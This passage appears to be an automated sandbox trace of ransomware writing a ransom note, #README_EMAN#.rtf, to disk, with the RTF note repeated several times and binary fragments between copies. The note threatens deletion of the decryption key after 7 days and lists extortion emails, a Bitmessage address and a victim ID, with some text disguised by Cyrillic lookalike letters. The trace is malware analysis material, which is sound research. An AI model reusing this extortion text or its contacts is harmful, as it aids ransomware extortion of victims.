decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n0055\x1eQX@£ºñÃJÞ9\x87\x877æG(ÊJ\x03Þ", lpUsedDefaultChar=0x0) returned 8717 [0242.304] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0242.816] CloseHandle (hObject=0x2f4) returned 1 [0242.817] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\#readme_eman#.rtf")) returned 0xffffffff [0242.817] GetLastError () returned 0x2 [0242.817] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0242.817] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0242.817] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0242.817] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or 